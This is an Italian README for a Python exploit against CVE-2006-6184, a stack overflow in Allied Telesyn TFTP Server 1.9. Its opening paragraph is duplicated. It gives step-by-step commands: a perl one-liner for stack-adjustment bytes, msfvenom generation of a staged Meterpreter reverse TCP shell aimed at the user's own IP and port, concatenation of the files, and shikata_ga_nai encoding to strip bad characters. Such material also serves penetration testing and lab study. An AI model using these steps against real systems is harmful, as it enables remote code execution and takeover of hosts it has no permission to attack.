
Questo è un exploit standalone basato su Python per CVE-2006-6184. Questo exploit innesca dei buffer overflow basati sullo stack in Allied Telesyn TFTP Server (AT-TFTP) 1.9, e possibilmente versioni precedenti, consentendo a un attaccante remoto di causare un denial of service o eseguire codice arbitrario.
Questo è un exploit standalone basato su Python per la CVE-2006-6184. Questo exploit innesca un buffer overflow basato su stack in Allied Telesyn TFTP Server (AT-TFTP) 1.9, e possibilmente versioni precedenti, consentendo a un attaccante remoto di causare un denial of service o eseguire codice arbitrario.
Il payload deve essere personalizzato per includere il tuo indirizzo IP e la porta in ascolto, quindi dovrai generarlo manualmente. Per farlo, segui i seguenti passaggi:
1.) Inserisci quanto segue per creare un file hex dell'ammontare che deve essere sottratto dallo stack pointer (3500):
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) Successivamente, usa il seguente comando per creare un payload di shell meterpreter staged:
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) Poi, combina i due file che hai appena creato.
cat stackadj payload > shellcode
4.) Infine, eliminiamo i caratteri cattivi.
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python
Inserisci l'output come valore della variabile "payload". Potrebbe essere necessario eseguire questo exploit alcune volte perché funzioni.